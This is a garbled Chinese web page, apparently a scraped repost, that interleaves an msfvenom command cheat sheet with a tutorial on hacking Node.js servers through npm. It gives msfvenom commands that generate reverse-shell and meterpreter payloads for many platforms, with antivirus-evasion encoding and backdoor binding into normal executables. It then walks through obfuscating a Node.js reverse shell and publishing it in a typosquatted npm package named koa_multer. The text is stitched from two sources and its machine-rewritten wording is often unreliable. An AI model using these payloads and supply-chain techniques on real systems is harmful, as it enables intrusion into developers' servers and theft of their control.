菲律宾申傅娱乐:Msfvenom学习总结,我是这样黑进你Node

原标题:我是如此黑进你Node.js生产服务器的

1.    –p (- -payload-options)

来源:HackingSexy

style=”font-size: 16px;”>

增添载荷payload。

TL,DR:

载荷那一个东西很多,那一个软件就是基于对应的载重payload生成对应平台下的后门,所以独有选对payload,再填写精确本身的IP,PORT就足以扭转对应语言,对应平台的后门了!!!

这篇文章陈述了从一个黑客的角度,以渗透前端项目为指标,从转换payload,混淆,掩饰 payload,公布 npm,社会工程学提
PTiguan,运维脚本,反向连接到攻击主机,最终主机获得服务器 shell
的传说。

(- -payload-options 列出payload选项)

正片:

2.    –l

前面一个技术员的口头禅是吗?npm
install!

翻开全数payload encoder nops。

其一命令从 npm 旅舍中下载一群从系列package.json 中宣称的依赖,下载完信任后,再下载信赖中 package.json
注脚的信任性,下载完注重的借助后,再下载重视中 package.json 注明的重视中的
package.json 注脚的依赖,下载完依赖后…………

3.    –f (- -help-formats)

然后下了一批你都不亮堂从何地来的 npm
包。

出口文件格式。

菲律宾申傅娱乐 1

(- -help-formats 列出富有文件格式)

菲律宾申傅娱乐 2

Executable formats:

前端程序猿的另贰个口头禅是哪些?npm run
dev!

asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only,
exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac,
osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh,
vbs, war

嗯!分界面展现 compile
successful!很周密的一遍编译!你感到是时候显得实在的本事了!

Transform formats:

此时,在网线的另三头,三个骇客微微一笑:又有一个肉鸡上线了。

bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication,
vbscript

那中档都发生了什么样?

4.    –e

生成 Payload

编码免杀。

经验丰盛的观赏鱼类类佬都清楚,要钓鱼,是迟早要先做鱼钩的。黑客也要钓鱼,鱼钩是甚?在红客的世界里,有二个鱼钩店,叫做
msfvenom,专治各个款(架)式(构),各类型(语)号(言)的鱼(机器)。msfvenom
是 metasploit 的一部分,集成在了 Kali 系统内部。在 Kali
的官方网站,有现有的虚构机镜像,下载了就能够用。

5.    –a (- -platform  – -help-platforms)

在 Kali 的 Terminal 里输入:

慎选架构平台

msfvenom -l | grep node

x86 | x64 | x86_64

能够列出全体协理 Node.js 的
payload。这一定于到店里问:老董!笔者要买鱼钩!要能钓 Node.js
的这种!COO:好嘞!要哪款?

Platforms:

菲律宾申傅娱乐 3

windows, netware, android, java, ruby, linux, cisco, solaris, osx,
bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php,
javascript, python, nodejs, firefox, mainframe

菲律宾申傅娱乐 4

6.    –o

在这里间,我们选拔nodejs/shell_reverse_tcp,其实产业界最常用的 payload 是
meterpreter,不过那款鱼钩还没上市:

文件输出。

怎么生成我们的 payload 呢,输入:

7.    –s

msfvenom -p nodejs/shell_reverse_tcp
LHOST=192.168.199.165 LPORT=5432 -o index.js

生成payload的最大尺寸,正是文件大小。

那边说一下安插的参数:

8.    –b

  • -p nodejs/shell_reverse_tcp 指的是我们要用
    nodejs/shell_reverse_tcp 这个 payload;
  • LHOST=192.168.199.165 指的是攻击主机的 IP
    地址,由于本次攻击是内网演示,所以用了内网 IP
    。公网攻击的话,就要配个公网 IP;
  • LPORT=5432 攻击主机那边的监听端口,payload
    运营后,被口诛笔伐方会尝试连接攻击主机的这么些端口;
  • -o index.js 意思是出口到 index.js 这一个文件中。

幸免接纳的字符 举例:不采取 ‘f’。

敲完指令之后,大家得以在当前目录得到三个名称叫index.js 的 payload,也正是我们刚买到的鱼钩。payload 十分小非常小,独有 803
字节。用

9.    –i

cat index.js

编码次数。

一声令下,能够见见 payload 长什么样。

10.         –c

菲律宾申傅娱乐 5

加上自个儿的shellcode。

菲律宾申傅娱乐 6

11.         –x | -k

那时候警觉的前端就能够跳出来怼作者:胸底,你那代码里又调用
cmd 又调用 /bin/sh,还把攻击 IP
和端口都展暴光来了,呆子才会运作你的代码哦?

捆绑。举例:原先有个健康文件normal.exe
能够透过这么些选项把后门捆绑到那几个程序方面。

别急嘛,好戏才刚刚开首。

MSFVENOM实例

12.         普通生成

  1. msfvenom -p <payload> <payload options> -f <format> -o <path>

  2. msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:back.exe

13.         编码处理型

  1. msfvenom -p <payload> -e <encoder > -i <encoder times> -n <nopsled> -f <format> -o <path>

  2. msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:back.exe

14.         捆绑

  1. Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:nomal.exe –k –f exe –o
    C:shell.exe

15.         Windows

  1. Msfvenom –platform windows –a x86 –p
    windows/meterpreter/reverse_tcp –i 3 –e
    x86/shikata_ga_nai –f exe –o C:back.exe

  2. Msfvenom –platform windows –a x86 –p
    windows/x64/meterpreter/reverse_tcp –f exe –o C:back.exe

16.         Linux

  1. msfvenom -p
    linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

17.         MAC

  1. msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

18.         PHP

  1. msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On> -f raw > shell.php

19.         Asp

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

20.         Aspx

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

21.         JSP

  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

22.         War

  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On> -f war > shell.war

23.         Bash

  1. msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On>-f raw > shell.sh

24.         Perl

  1. msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

25.         Python

  1. msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP
    Address> LPORT=<Your Port to Connect On> -f raw > shell.py

 

 

转载:

混淆

价值观的杀毒软件,是经过检验文件特定字符来明确病毒特征的,而由此修改特征码绕过杀毒软件的检查评定,大家誉为免杀。

而 Java
的变通,俨然比海贼王里的路飞还要伸缩自如。

举个例证,一行轻松的代码:

alert(1)

用 jsfuck
能把它变得连老妈都认不出来:

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(菲律宾申傅娱乐,![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

自然大家不用
jsfuck,因为混淆过后的代码太大了。

前端喜欢用 UglifyJS
来压缩代码,但在这里场景下,只怕不是最优解。大家用 Java Obfuscator
Tool。

复制 payload,打开

Obfuscate,一道菜就做到了。

菲律宾申傅娱乐 7

菲律宾申傅娱乐 8

明日早已未有人类能读懂这段代码了,混淆任务完结。

隐藏 payload

npm
是共产主义的大米仓,任何人都得以进献自个儿的代码到 npm
上去。但是怎么让人家下载我们的代码呢?那是一门高深的学识。

例行的思路是,做三个和例行 npm
包名字很像的包名,例如 koa-multer,能够做三个koa_multer,然后总有一部分人会打错字,下载到包括 payload
的包。那是三个可能率难题,下载 koa-multer 的总的数量越大,下载 koa_multer
的量也越大。

以 koa-multer 为例,大家先把代码 clone
下载下来。

git clone

把大家转移的 payload
复制到项目路径下,并在 index.js 中引进那个文件。

把 package.json 和 README.md 里全数的
koa-multer 改成 koa_multer,并在 package.json 的 files 注明 payload
的文件名,大家就做好了三个富含 payload 的 npm 包。

获得这么些包,就足以揭露到 npm
源了:

npm publish

为了演示,笔者在本地搭了五个 npm
服务器。

相关文章